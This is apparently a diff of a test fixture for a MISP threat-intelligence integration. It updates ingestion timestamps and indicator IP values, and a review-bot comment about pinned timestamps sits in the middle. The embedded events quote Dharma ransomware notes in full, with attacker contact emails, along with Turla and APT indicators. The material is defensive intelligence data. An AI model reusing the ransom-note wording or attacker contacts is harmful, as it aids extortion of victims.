@@ -143,8 +143,8 @@ } }, "event": { - "ingested": "2021-10-19T14:58:42.046335498Z", - "original": "{\"Event\":{\"Attribute\":{\"id\":\"10794\",\"type\":\"domain|ip\",\"category\":\"Network activity\",\"to_ids\":false,\"uuid\":\"5bf30242-8ef4-4c52-a2d7-0b7b0a016219\",\"event_id\":\"14\",\"distribution\":\"5\",\"timestamp\":\"1542652482\",\"comment\":\"1st stage\",\"sharing_group_id\":\"0\",\"deleted\":false,\"disable_correlation\":false,\"object_id\":\"0\",\"object_relation\":null,\"first_seen\":null,\"last_seen\":null,\"value\":\"your-ip.getmyip.com|178.128.103.74\",\"Galaxy\":[],\"ShadowAttribute\":[]},\"EventReport\":[],\"Galaxy\":[{\"GalaxyCluster\":[{\"authors\":[\"https://docs.google.com/spreadsheets/d/1TWS238xacAto-fLKh1n5uTsdijWdCEsGIM0Y0Hvmc5g/pubhtml\",\"http://pastebin.com/raw/GHgpWjar\",\"MISP Project\"],\"collection_uuid\":\"10cf658b-5d32-4c4b-bb32-61760a640372\",\"description\":\"It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. CrySiS \\\\u003e Dharma Note: ATTENTION! At the moment, your system is not protected. We can fix it and restore files. To restore the system write to this address: bitcoin143@india.com. 
CrySiS variant\",\"galaxy_id\":\"43\",\"id\":\"6619\",\"local\":false,\"meta\":{\"date\":[\"November 2016\"],\"encryption\":[\"AES + RSA-512\"],\"extensions\":[\".dharma\",\".wallet\",\".zzzzz\",\".cmb\",\".id-BCBEF350.[paymentbtc@firemail.cc].cmb\",\".bip\",\".id-BCBEF350.[Beamsell@qq.com].bip\",\".boost\",\".[Darknes@420blaze.it].waifu\",\".brrr\",\".adobe\",\".tron\",\".AUDIT\",\".cccmn\",\".fire\",\".myjob\",\".[cyberwars@qq.com].war\",\".risk\",\".RISK\",\".bkpx\",\".[newsantaclaus@aol.com].santa\"],\"payment-method\":[\"Bitcoin - Email\"],\"ransomnotes\":[\"all your data has been locked us\\\\nYou want to return?\\\\nwrite email paymentbtc@firemail.cc\",\"All your files have been encrypted!\\\\nAll your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail paymentbtc@firemail.cc\\\\nWrite this ID in the title of your message ACBFF130\\\\nIn case of no answer in 24 hours write us to theese e-mails:paymentbtc@firemail.cc\\\\nYou have to pay for decryption in Bitcoins. The price depends on how fast you write to us. After payment we will send you the decryption tool that will decrypt all your files.\\\\nFree decryption as guarantee\\\\nBefore paying you can send us up to 1 file for free decryption. The total size of files must be less than 1Mb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.)\\\\nHow to obtain Bitcoins\\\\nThe easiest way to buy bitcoins is LocalBitcoins site. 
You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\\\\nhttps://localbitcoins.com/buy_bitcoins\\\\nAlso you can find other places to buy Bitcoins and beginners guide here:\\\\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/\\\\nAttention!\\\\nDo not rename encrypted files.\\\\nDo not try to decrypt your data using third party software, it may cause permanent data loss.\\\\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.\",\"All your files have been encrypted!\\\\nAll your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail Beamsell@qq.com\\\\nWrite this ID in the title of your message BCBEF350\\\\nIn case of no answer in 24 hours write us to theese e-mails:Beamsell@qq.com\\\\nYou have to pay for decryption in Bitcoins. The price depends on how fast you write to us. After payment we will send you the decryption tool that will decrypt all your files. \\\\nFree decryption as guarantee\\\\nBefore paying you can send us up to 1 file for free decryption. The total size of files must be less than 1Mb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.) \\\\nHow to obtain Bitcoins\\\\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price. \\\\nhttps://localbitcoins.com/buy_bitcoins \\\\nAlso you can find other places to buy Bitcoins and beginners guide here: \\\\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/ \\\\nAttention!\\\\nDo not rename encrypted files. 
\\\\nDo not try to decrypt your data using third party software, it may cause permanent data loss.\\\\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.\",\"all your data has been locked us\\\\nYou want to return?\\\\nwrite email Beamsell@qq.com\"],\"ransomnotes-filenames\":[\"README.txt\",\"README.jpg\",\"Info.hta\",\"FILES ENCRYPTED.txt\",\"INFO.hta\"],\"ransomnotes-refs\":[\"https://www.bleepstatic.com/images/news/ransomware/d/dharma/cmb/hta-ransom-note.jpg\",\"https://pbs.twimg.com/media/Dmof_FiXsAAAvTN.jpg\",\"https://pbs.twimg.com/media/Dmof_FyXsAEJmgQ.jpg\",\"https://pbs.twimg.com/media/DrWqLWzXgAc4SlG.jpg\",\"https://pbs.twimg.com/media/DuEBIMBW0AANnGW.jpg\"],\"refs\":[\"https://id-ransomware.blogspot.co.il/2016/11/dharma-ransomware.html\",\"https://www.bleepingcomputer.com/news/security/kaspersky-releases-decryptor-for-the-dharma-ransomware/\",\"https://www.bleepingcomputer.com/news/security/new-cmb-dharma-ransomware-variant-released/\",\"https://www.bleepingcomputer.com/news/security/new-bip-dharma-ransomware-variant-released/\",\"https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-october-12th-2018-notpetya-gandcrab-and-more/\",\"https://twitter.com/demonslay335/status/1049313390097813504\",\"https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-september-14th-2018-kraken-dharma-and-matrix/\",\"https://twitter.com/JakubKroustek/status/1038680437508501504\",\"https://twitter.com/demonslay335/status/1059521042383814657\",\"https://twitter.com/demonslay335/status/1059940414147489792\",\"https://twitter.com/JakubKroustek/status/1060825783197933568\",\"https://twitter.com/JakubKroustek/status/1064061275863425025\",\"https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-november-23rd-2018-stop-dharma-and-more/\",\"https://www.youtube.com/watch?v=qjoYtwLx2TI\",\"https://twitter.com/GrujaRS/status/1072139616910757888\
"]},\"source\":\"Various\",\"tag_id\":\"23\",\"tag_name\":\"misp-galaxy:ransomware=\\\"Dharma Ransomware\\\"\",\"type\":\"ransomware\",\"uuid\":\"2b365b2c-4a9a-4b66-804d-3b2d2814fe7b\",\"value\":\"Dharma Ransomware\",\"version\":\"86\"}],\"description\":\"Ransomware galaxy based on https://docs.google.com/spreadsheets/d/1TWS238xacAto-fLKh1n5uTsdijWdCEsGIM0Y0Hvmc5g/pubhtml\",\"icon\":\"btc\",\"id\":\"43\",\"name\":\"Ransomware\",\"namespace\":\"misp\",\"type\":\"ransomware\",\"uuid\":\"3f44af2e-1480-4b6b-9aa8-f9bb21341078\",\"version\":\"4\"}],\"Object\":[],\"Org\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"982f7c55-684d-4eb9-8736-fb5f668b899d\"},\"Orgc\":{\"id\":\"2\",\"local\":false,\"name\":\"CIRCL\",\"uuid\":\"55f6ea5e-2c60-40e5-964f-47a8950d210f\"},\"RelatedEvent\":[],\"ShadowAttribute\":[],\"Tag\":[{\"colour\":\"#0088cc\",\"exportable\":true,\"hide_tag\":false,\"id\":\"23\",\"local\":0,\"name\":\"misp-galaxy:ransomware=\\\"Dharma Ransomware\\\"\",\"numerical_value\":null,\"user_id\":\"0\"},{\"colour\":\"#004646\",\"exportable\":true,\"hide_tag\":false,\"id\":\"21\",\"local\":0,\"name\":\"type:OSINT\",\"numerical_value\":null,\"user_id\":\"0\"},{\"colour\":\"#ffffff\",\"exportable\":true,\"hide_tag\":false,\"id\":\"2\",\"local\":0,\"name\":\"tlp:white\",\"numerical_value\":null,\"user_id\":\"0\"},{\"colour\":\"#2c4f00\",\"exportable\":true,\"hide_tag\":false,\"id\":\"24\",\"local\":0,\"name\":\"malware_classification:malware-category=\\\"Ransomware\\\"\",\"numerical_value\":null,\"user_id\":\"0\"},{\"colour\":\"#00223b\",\"exportable\":true,\"hide_tag\":false,\"id\":\"3\",\"local\":0,\"name\":\"osint:source-type=\\\"blog - post\\\"\",\"numerical_value\":null,\"user_id\":\"0\"}],\"analysis\":\"2\",\"attribute_count\":\"7\",\"date\":\"2017-08-25\",\"disable_correlation\":false,\"distribution\":\"3\",\"extends_uuid\":\"\",\"id\":\"5\",\"info\":\"OSINT - New Arena Crysis Ransomware Variant 
Released\",\"locked\":false,\"org_id\":\"1\",\"orgc_id\":\"2\",\"proposal_email_lock\":false,\"publish_timestamp\":\"1603226331\",\"published\":true,\"sharing_group_id\":\"0\",\"threat_level_id\":\"3\",\"timestamp\":\"1503930276\",\"uuid\":\"59a3d08d-5dc8-4153-bc7c-456d950d210f\"}}", + "ingested": "2021-12-09T13:49:05.849324600Z", + "original": "{\"Event\":{\"Attribute\":{\"id\":\"10794\",\"type\":\"domain|ip\",\"category\":\"Network activity\",\"to_ids\":false,\"uuid\":\"5bf30242-8ef4-4c52-a2d7-0b7b0a016219\",\"event_id\":\"14\",\"distribution\":\"5\",\"timestamp\":\"1542652482\",\"comment\":\"1st stage\",\"sharing_group_id\":\"0\",\"deleted\":false,\"disable_correlation\":false,\"object_id\":\"0\",\"object_relation\":null,\"first_seen\":null,\"last_seen\":null,\"value\":\"your-ip.getmyip.com|89.160.20.156\",\"Galaxy\":[],\"ShadowAttribute\":[]},\"EventReport\":[],\"Galaxy\":[{\"GalaxyCluster\":[{\"authors\":[\"https://docs.google.com/spreadsheets/d/1TWS238xacAto-fLKh1n5uTsdijWdCEsGIM0Y0Hvmc5g/pubhtml\",\"http://pastebin.com/raw/GHgpWjar\",\"MISP Project\"],\"collection_uuid\":\"10cf658b-5d32-4c4b-bb32-61760a640372\",\"description\":\"It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. CrySiS \\\\u003e Dharma Note: ATTENTION! At the moment, your system is not protected. We can fix it and restore files. To restore the system write to this address: bitcoin143@india.com. 
CrySiS variant\",\"galaxy_id\":\"43\",\"id\":\"6619\",\"local\":false,\"meta\":{\"date\":[\"November 2016\"],\"encryption\":[\"AES + RSA-512\"],\"extensions\":[\".dharma\",\".wallet\",\".zzzzz\",\".cmb\",\".id-BCBEF350.[paymentbtc@firemail.cc].cmb\",\".bip\",\".id-BCBEF350.[Beamsell@qq.com].bip\",\".boost\",\".[Darknes@420blaze.it].waifu\",\".brrr\",\".adobe\",\".tron\",\".AUDIT\",\".cccmn\",\".fire\",\".myjob\",\".[cyberwars@qq.com].war\",\".risk\",\".RISK\",\".bkpx\",\".[newsantaclaus@aol.com].santa\"],\"payment-method\":[\"Bitcoin - Email\"],\"ransomnotes\":[\"all your data has been locked us\\\\nYou want to return?\\\\nwrite email paymentbtc@firemail.cc\",\"All your files have been encrypted!\\\\nAll your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail paymentbtc@firemail.cc\\\\nWrite this ID in the title of your message ACBFF130\\\\nIn case of no answer in 24 hours write us to theese e-mails:paymentbtc@firemail.cc\\\\nYou have to pay for decryption in Bitcoins. The price depends on how fast you write to us. After payment we will send you the decryption tool that will decrypt all your files.\\\\nFree decryption as guarantee\\\\nBefore paying you can send us up to 1 file for free decryption. The total size of files must be less than 1Mb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.)\\\\nHow to obtain Bitcoins\\\\nThe easiest way to buy bitcoins is LocalBitcoins site. 
You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\\\\nhttps://localbitcoins.com/buy_bitcoins\\\\nAlso you can find other places to buy Bitcoins and beginners guide here:\\\\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/\\\\nAttention!\\\\nDo not rename encrypted files.\\\\nDo not try to decrypt your data using third party software, it may cause permanent data loss.\\\\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.\",\"All your files have been encrypted!\\\\nAll your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail Beamsell@qq.com\\\\nWrite this ID in the title of your message BCBEF350\\\\nIn case of no answer in 24 hours write us to theese e-mails:Beamsell@qq.com\\\\nYou have to pay for decryption in Bitcoins. The price depends on how fast you write to us. After payment we will send you the decryption tool that will decrypt all your files. \\\\nFree decryption as guarantee\\\\nBefore paying you can send us up to 1 file for free decryption. The total size of files must be less than 1Mb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.) \\\\nHow to obtain Bitcoins\\\\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price. \\\\nhttps://localbitcoins.com/buy_bitcoins \\\\nAlso you can find other places to buy Bitcoins and beginners guide here: \\\\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/ \\\\nAttention!\\\\nDo not rename encrypted files. 
\\\\nDo not try to decrypt your data using third party software, it may cause permanent data loss.\\\\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.\",\"all your data has been locked us\\\\nYou want to return?\\\\nwrite email Beamsell@qq.com\"],\"ransomnotes-filenames\":[\"README.txt\",\"README.jpg\",\"Info.hta\",\"FILES ENCRYPTED.txt\",\"INFO.hta\"],\"ransomnotes-refs\":[\"https://www.bleepstatic.com/images/news/ransomware/d/dharma/cmb/hta-ransom-note.jpg\",\"https://pbs.twimg.com/media/Dmof_FiXsAAAvTN.jpg\",\"https://pbs.twimg.com/media/Dmof_FyXsAEJmgQ.jpg\",\"https://pbs.twimg.com/media/DrWqLWzXgAc4SlG.jpg\",\"https://pbs.twimg.com/media/DuEBIMBW0AANnGW.jpg\"],\"refs\":[\"https://id-ransomware.blogspot.co.il/2016/11/dharma-ransomware.html\",\"https://www.bleepingcomputer.com/news/security/kaspersky-releases-decryptor-for-the-dharma-ransomware/\",\"https://www.bleepingcomputer.com/news/security/new-cmb-dharma-ransomware-variant-released/\",\"https://www.bleepingcomputer.com/news/security/new-bip-dharma-ransomware-variant-released/\",\"https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-october-12th-2018-notpetya-gandcrab-and-more/\",\"https://twitter.com/demonslay335/status/1049313390097813504\",\"https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-september-14th-2018-kraken-dharma-and-matrix/\",\"https://twitter.com/JakubKroustek/status/1038680437508501504\",\"https://twitter.com/demonslay335/status/1059521042383814657\",\"https://twitter.com/demonslay335/status/1059940414147489792\",\"https://twitter.com/JakubKroustek/status/1060825783197933568\",\"https://twitter.com/JakubKroustek/status/1064061275863425025\",\"https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-november-23rd-2018-stop-dharma-and-more/\",\"https://www.youtube.com/watch?v=qjoYtwLx2TI\",\"https://twitter.com/GrujaRS/status/1072139616910757888\
"]},\"source\":\"Various\",\"tag_id\":\"23\",\"tag_name\":\"misp-galaxy:ransomware=\\\"Dharma Ransomware\\\"\",\"type\":\"ransomware\",\"uuid\":\"2b365b2c-4a9a-4b66-804d-3b2d2814fe7b\",\"value\":\"Dharma Ransomware\",\"version\":\"86\"}],\"description\":\"Ransomware galaxy based on https://docs.google.com/spreadsheets/d/1TWS238xacAto-fLKh1n5uTsdijWdCEsGIM0Y0Hvmc5g/pubhtml\",\"icon\":\"btc\",\"id\":\"43\",\"name\":\"Ransomware\",\"namespace\":\"misp\",\"type\":\"ransomware\",\"uuid\":\"3f44af2e-1480-4b6b-9aa8-f9bb21341078\",\"version\":\"4\"}],\"Object\":[],\"Org\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"982f7c55-684d-4eb9-8736-fb5f668b899d\"},\"Orgc\":{\"id\":\"2\",\"local\":false,\"name\":\"CIRCL\",\"uuid\":\"55f6ea5e-2c60-40e5-964f-47a8950d210f\"},\"RelatedEvent\":[],\"ShadowAttribute\":[],\"Tag\":[{\"colour\":\"#0088cc\",\"exportable\":true,\"hide_tag\":false,\"id\":\"23\",\"local\":0,\"name\":\"misp-galaxy:ransomware=\\\"Dharma Ransomware\\\"\",\"numerical_value\":null,\"user_id\":\"0\"},{\"colour\":\"#004646\",\"exportable\":true,\"hide_tag\":false,\"id\":\"21\",\"local\":0,\"name\":\"type:OSINT\",\"numerical_value\":null,\"user_id\":\"0\"},{\"colour\":\"#ffffff\",\"exportable\":true,\"hide_tag\":false,\"id\":\"2\",\"local\":0,\"name\":\"tlp:white\",\"numerical_value\":null,\"user_id\":\"0\"},{\"colour\":\"#2c4f00\",\"exportable\":true,\"hide_tag\":false,\"id\":\"24\",\"local\":0,\"name\":\"malware_classification:malware-category=\\\"Ransomware\\\"\",\"numerical_value\":null,\"user_id\":\"0\"},{\"colour\":\"#00223b\",\"exportable\":true,\"hide_tag\":false,\"id\":\"3\",\"local\":0,\"name\":\"osint:source-type=\\\"blog - post\\\"\",\"numerical_value\":null,\"user_id\":\"0\"}],\"analysis\":\"2\",\"attribute_count\":\"7\",\"date\":\"2017-08-25\",\"disable_correlation\":false,\"distribution\":\"3\",\"extends_uuid\":\"\",\"id\":\"5\",\"info\":\"OSINT - New Arena Crysis Ransomware Variant 
Released\",\"locked\":false,\"org_id\":\"1\",\"orgc_id\":\"2\",\"proposal_email_lock\":false,\"publish_timestamp\":\"1603226331\",\"published\":true,\"sharing_group_id\":\"0\",\"threat_level_id\":\"3\",\"timestamp\":\"1503930276\",\"uuid\":\"59a3d08d-5dc8-4153-bc7c-456d950d210f\"}}", "category": "threat", "type": "indicator", "kind": "enrichment" 
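Review bot: The `ingested` line on the new side of this hunk is an artifact of regenerating the fixture rather than part of the IP change, and the same churn repeats in @@ -224, @@ -300, @@ -372, @@ -446, @@ -518, @@ -594 and @@ -668, where it is the only change. Pinning `event.ingested` in an expected-output file means every regeneration rewrites it and buries the substantive edit, which here is the single `value` change inside `original`. If the test harness supports marking a field as dynamic (elastic-package's pipeline test config has a `dynamic_fields` option for this), excluding `event.ingested` there would leave only real changes in these hunks. The updated `value` otherwise matches the `ip` change in @@ -135.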
@@ -224,7 +224,7 @@ } }, "event": { - "ingested": "2021-10-19T14:58:42.046341539Z", + "ingested": "2021-12-09T13:49:05.849329300Z", "original": "{\"Event\":{\"Attribute\":{\"Galaxy\":[],\"ShadowAttribute\":[],\"category\":\"External analysis\",\"comment\":\"Carbon sample - Xchecked via VT: a08b8371ead1919500a4759c2f46553620d5a9d9\",\"deleted\":false,\"disable_correlation\":false,\"distribution\":\"5\",\"event_id\":\"4\",\"first_seen\":null,\"id\":\"342\",\"last_seen\":null,\"object_id\":\"0\",\"object_relation\":null,\"sharing_group_id\":\"0\",\"timestamp\":\"1490878550\",\"to_ids\":false,\"type\":\"link\",\"uuid\":\"58dd0056-6e74-43d5-b58b-494802de0b81\",\"value\":\"https://www.virustotal.com/file/7fa4482bfbca550ce296d8e791b1091d60d733ea8042167fd0eb853530584452/analysis/1486030116/\"},\"EventReport\":[],\"Galaxy\":[{\"GalaxyCluster\":[{\"authors\":[\"Alexandre Dulaunoy\",\"Florian Roth\",\"Timo Steffens\",\"Christophe Vandeplas\",\"Dennis Rand\",\"raw-data\"],\"collection_uuid\":\"0d821b68-9d82-4c6d-86a6-1071a9e0f79f\",\"description\":\"Family of related sophisticated backdoor software - Name comes from Microsoft detection signature – anagram of Ultra (Ultra3) was a name of the fake driver). A macOS version exists but appears incomplete and lacking features...for now!\",\"galaxy_id\":\"36\",\"id\":\"5828\",\"local\":false,\"meta\":{\"refs\":[\"https://www.first.org/resources/papers/tbilisi2014/turla-operations_and_development.pdf\",\"https://objective-see.com/blog/blog_0x25.html#Snake\"],\"synonyms\":[\"Snake\",\"Uroburos\",\"Urouros\"],\"type\":[\"Backdoor\",\"Rootkit\"]},\"source\":\"MISP Project\",\"tag_id\":\"22\",\"tag_name\":\"misp-galaxy:tool=\\\"Turla\\\"\",\"type\":\"tool\",\"uuid\":\"22332d52-c0c2-443c-9ffb-f08c0d23722c\",\"value\":\"Turla\",\"version\":\"138\"}],\"description\":\"Threat actors tools is an enumeration of tools used by adversaries. 
The list includes malware but also common software regularly used by the adversaries.\",\"icon\":\"optin-monster\",\"id\":\"36\",\"name\":\"Tool\",\"namespace\":\"misp\",\"type\":\"tool\",\"uuid\":\"9b8037f7-bc8f-4de1-a797-37266619bc0b\",\"version\":\"3\"}],\"Object\":[],\"Org\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"982f7c55-684d-4eb9-8736-fb5f668b899d\"},\"Orgc\":{\"id\":\"2\",\"local\":false,\"name\":\"CIRCL\",\"uuid\":\"55f6ea5e-2c60-40e5-964f-47a8950d210f\"},\"RelatedEvent\":[{\"Event\":{\"Org\":{\"id\":\"1\",\"name\":\"ORGNAME\",\"uuid\":\"982f7c55-684d-4eb9-8736-fb5f668b899d\"},\"Orgc\":{\"id\":\"4\",\"name\":\"CthulhuSPRL.be\",\"uuid\":\"55f6ea5f-fd34-43b8-ac1d-40cb950d210f\"},\"analysis\":\"2\",\"date\":\"2015-01-20\",\"distribution\":\"3\",\"id\":\"369\",\"info\":\"OSINT Analysis of Project Cobra Another extensible framework used by the Uroburos’ actors from Gdata\",\"org_id\":\"1\",\"orgc_id\":\"4\",\"published\":true,\"threat_level_id\":\"1\",\"timestamp\":\"1498163317\",\"uuid\":\"54bf5a6f-ac50-4f71-9cd3-7080950d210b\"}},{\"Event\":{\"Org\":{\"id\":\"1\",\"name\":\"ORGNAME\",\"uuid\":\"982f7c55-684d-4eb9-8736-fb5f668b899d\"},\"Orgc\":{\"id\":\"4\",\"name\":\"CthulhuSPRL.be\",\"uuid\":\"55f6ea5f-fd34-43b8-ac1d-40cb950d210f\"},\"analysis\":\"2\",\"date\":\"2014-11-20\",\"distribution\":\"3\",\"id\":\"621\",\"info\":\"Turla digging using 
TotalHash\",\"org_id\":\"1\",\"orgc_id\":\"4\",\"published\":true,\"threat_level_id\":\"2\",\"timestamp\":\"1498163604\",\"uuid\":\"546daad5-425c-4ac4-82c7-e07f950d210b\"}}],\"ShadowAttribute\":[],\"Tag\":[{\"colour\":\"#065100\",\"exportable\":true,\"hide_tag\":false,\"id\":\"22\",\"local\":0,\"name\":\"misp-galaxy:tool=\\\"Turla\\\"\",\"numerical_value\":null,\"user_id\":\"0\"},{\"colour\":\"#ffffff\",\"exportable\":true,\"hide_tag\":false,\"id\":\"2\",\"local\":0,\"name\":\"tlp:white\",\"numerical_value\":null,\"user_id\":\"0\"}],\"analysis\":\"2\",\"attribute_count\":\"100\",\"date\":\"2017-03-30\",\"disable_correlation\":false,\"distribution\":\"3\",\"extends_uuid\":\"\",\"id\":\"4\",\"info\":\"OSINT - Carbon Paper: Peering into Turla’s second stage backdoor\",\"locked\":false,\"org_id\":\"1\",\"orgc_id\":\"2\",\"proposal_email_lock\":false,\"publish_timestamp\":\"1603226330\",\"published\":true,\"sharing_group_id\":\"0\",\"threat_level_id\":\"3\",\"timestamp\":\"1493403824\",\"uuid\":\"58dcfe62-ed84-4e5e-b293-4991950d210f\"}}", "category": "threat", "type": "indicator", 
@@ -300,7 +300,7 @@ } }, "event": { - "ingested": "2021-10-19T14:58:42.046346579Z", + "ingested": "2021-12-09T13:49:05.849333800Z", "original": "{\"Event\":{\"id\":\"2\",\"orgc_id\":\"2\",\"org_id\":\"1\",\"date\":\"2014-10-03\",\"threat_level_id\":\"2\",\"info\":\"OSINT New Indicators of Compromise for APT Group Nitro Uncovered blog post by Palo Alto Networks\",\"published\":true,\"uuid\":\"54323f2c-e50c-4268-896c-4867950d210b\",\"attribute_count\":\"29\",\"analysis\":\"2\",\"timestamp\":\"1412579577\",\"distribution\":\"3\",\"proposal_email_lock\":false,\"locked\":false,\"publish_timestamp\":\"1610622316\",\"sharing_group_id\":\"0\",\"disable_correlation\":false,\"extends_uuid\":\"\",\"Org\":{\"id\":\"1\",\"name\":\"ORGNAME\",\"uuid\":\"5877549f-ea76-4b91-91fb-c72ad682b4a5\",\"local\":true},\"Orgc\":{\"id\":\"2\",\"name\":\"CthulhuSPRL.be\",\"uuid\":\"55f6ea5f-fd34-43b8-ac1d-40cb950d210f\",\"local\":false},\"Attribute\":{\"id\":\"1077\",\"type\":\"sha256\",\"category\":\"External analysis\",\"to_ids\":true,\"uuid\":\"54324042-49fc-4628-a95e-44da950d210b\",\"event_id\":\"2\",\"distribution\":\"5\",\"timestamp\":\"1412579394\",\"comment\":\"\",\"sharing_group_id\":\"0\",\"deleted\":false,\"disable_correlation\":false,\"object_id\":\"0\",\"object_relation\":null,\"first_seen\":null,\"last_seen\":null,\"value\":\"0a1103bc90725d4665b932f88e81d39eafa5823b0de3ab146e2d4548b7da79a0\",\"Galaxy\":[],\"ShadowAttribute\":[]},\"ShadowAttribute\":[],\"RelatedEvent\":[],\"Galaxy\":[],\"Object\":[],\"EventReport\":[],\"Tag\":[{\"id\":\"1\",\"name\":\"type:OSINT\",\"colour\":\"#004646\",\"exportable\":true,\"user_id\":\"0\",\"hide_tag\":false,\"numerical_value\":null,\"is_galaxy\":false,\"is_custom_galaxy\":false,\"local\":0},{\"id\":\"2\",\"name\":\"tlp:green\",\"colour\":\"#339900\",\"exportable\":true,\"user_id\":\"0\",\"hide_tag\":false,\"numerical_value\":null,\"is_galaxy\":false,\"is_custom_galaxy\":false,\"local\":0}]}}", "category": "threat", "type": "indicator", 
@@ -364,7 +364,7 @@
 },
 "type": "ipv4-addr",
 "provider": "misp",
- "ip": "223.25.233.248",
+ "ip": "89.160.20.156",
 "scanner_stats": 2
 },
 "feed": {
@@ -372,8 +372,8 @@ } }, "event": { - "ingested": "2021-10-19T14:58:42.046351057Z", - "original": "{\"Event\":{\"id\":\"2\",\"orgc_id\":\"2\",\"org_id\":\"1\",\"date\":\"2014-10-03\",\"threat_level_id\":\"2\",\"info\":\"OSINT New Indicators of Compromise for APT Group Nitro Uncovered blog post by Palo Alto Networks\",\"published\":true,\"uuid\":\"54323f2c-e50c-4268-896c-4867950d210b\",\"attribute_count\":\"29\",\"analysis\":\"2\",\"timestamp\":\"1412579577\",\"distribution\":\"3\",\"proposal_email_lock\":false,\"locked\":false,\"publish_timestamp\":\"1610622316\",\"sharing_group_id\":\"0\",\"disable_correlation\":false,\"extends_uuid\":\"\",\"Org\":{\"id\":\"1\",\"name\":\"ORGNAME\",\"uuid\":\"5877549f-ea76-4b91-91fb-c72ad682b4a5\",\"local\":true},\"Orgc\":{\"id\":\"2\",\"name\":\"CthulhuSPRL.be\",\"uuid\":\"55f6ea5f-fd34-43b8-ac1d-40cb950d210f\",\"local\":false},\"Attribute\":{\"id\":\"1084\",\"type\":\"ip-dst\",\"category\":\"Network activity\",\"to_ids\":true,\"uuid\":\"54324081-3308-4f1f-8674-4953950d210b\",\"event_id\":\"2\",\"distribution\":\"5\",\"timestamp\":\"1412579457\",\"comment\":\"\",\"sharing_group_id\":\"0\",\"deleted\":false,\"disable_correlation\":false,\"object_id\":\"0\",\"object_relation\":null,\"first_seen\":null,\"last_seen\":null,\"value\":\"223.25.233.248\",\"Galaxy\":[],\"ShadowAttribute\":[]},\"ShadowAttribute\":[],\"RelatedEvent\":[],\"Galaxy\":[],\"Object\":[],\"EventReport\":[],\"Tag\":[{\"id\":\"1\",\"name\":\"type:OSINT\",\"colour\":\"#004646\",\"exportable\":true,\"user_id\":\"0\",\"hide_tag\":false,\"numerical_value\":null,\"is_galaxy\":false,\"is_custom_galaxy\":false,\"local\":0},{\"id\":\"2\",\"name\":\"tlp:green\",\"colour\":\"#339900\",\"exportable\":true,\"user_id\":\"0\",\"hide_tag\":false,\"numerical_value\":null,\"is_galaxy\":false,\"is_custom_galaxy\":false,\"local\":0}]}}", + "ingested": "2021-12-09T13:49:05.849337500Z", + "original": 
"{\"Event\":{\"id\":\"2\",\"orgc_id\":\"2\",\"org_id\":\"1\",\"date\":\"2014-10-03\",\"threat_level_id\":\"2\",\"info\":\"OSINT New Indicators of Compromise for APT Group Nitro Uncovered blog post by Palo Alto Networks\",\"published\":true,\"uuid\":\"54323f2c-e50c-4268-896c-4867950d210b\",\"attribute_count\":\"29\",\"analysis\":\"2\",\"timestamp\":\"1412579577\",\"distribution\":\"3\",\"proposal_email_lock\":false,\"locked\":false,\"publish_timestamp\":\"1610622316\",\"sharing_group_id\":\"0\",\"disable_correlation\":false,\"extends_uuid\":\"\",\"Org\":{\"id\":\"1\",\"name\":\"ORGNAME\",\"uuid\":\"5877549f-ea76-4b91-91fb-c72ad682b4a5\",\"local\":true},\"Orgc\":{\"id\":\"2\",\"name\":\"CthulhuSPRL.be\",\"uuid\":\"55f6ea5f-fd34-43b8-ac1d-40cb950d210f\",\"local\":false},\"Attribute\":{\"id\":\"1084\",\"type\":\"ip-dst\",\"category\":\"Network 